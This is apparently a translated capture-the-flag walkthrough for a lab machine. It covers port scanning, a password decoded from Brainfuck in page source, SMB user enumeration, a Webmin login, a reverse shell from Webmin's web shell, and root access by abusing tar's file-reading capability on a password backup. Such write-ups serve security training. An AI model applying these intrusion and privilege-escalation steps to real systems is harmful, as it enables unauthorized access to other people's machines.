1. Information collection
Scan for open ports
Access port 80
10000 port:
Webmin: A tool for managing system management configurations in the form of web pages. It is possible to configure operating system internals such as users, disk quotas, services or configuration files, as well as modify and control open source applications. Convenient operating system.
Port 20000 is also the login port
scan directory information
Visit the home page directory and view the source code of the home page
Discover encrypted content. The brainfuck language uses ><+-., [] eight symbols to replace various grammars and commands of the C language
The decryption is as follows: https://www.splitbrain.org/services/ook
For the record, possibly a password.
2. Vulnerability attack
The previously scanned ports are available at 10000 and 20000
- Try weak password blasting first, and fail;
- Analysis is the cms management system of webmin, you can find the vulnerability information of this cms (chaotic, not targeted) and keep it for now
Then analyze the scanned information and find that the port service is smb
The smb service is a protocol name that can be used for web connections and information communication between the client and the server. Through the SMB protocol, the client application can read and write files on the server in various network environments, and The server program makes a service request.
Enum4linux: is a tool for enumerating SMB services on windows and Linux systems, and can discover the following:
- domain and group membership
- user list
- Shares (drives and folders) on the device
- Password policy on the target
- Operating system of the remote target
Try to log in to webmin according to the blasted user and the decrypted password
Port 20000 can log in
Analyze the places that users can use, and view the cmd shell icon
Click to enter the shell, view files, view permissions, reverse shell
3. Escalation of rights
Whenever you see a copy of a binary, you should check its Capabilities and suid programs.
Query the function of the tar file in the current directory: getcap tar
tar cap_dac_read_search=ep capability allows reading any file
Password backup file found, but does not have any permissions
Use tar to package it and then unzip it, there will be no permission problem
Get backup password, switch root user
Escalation of rights is successful and the flag is obtained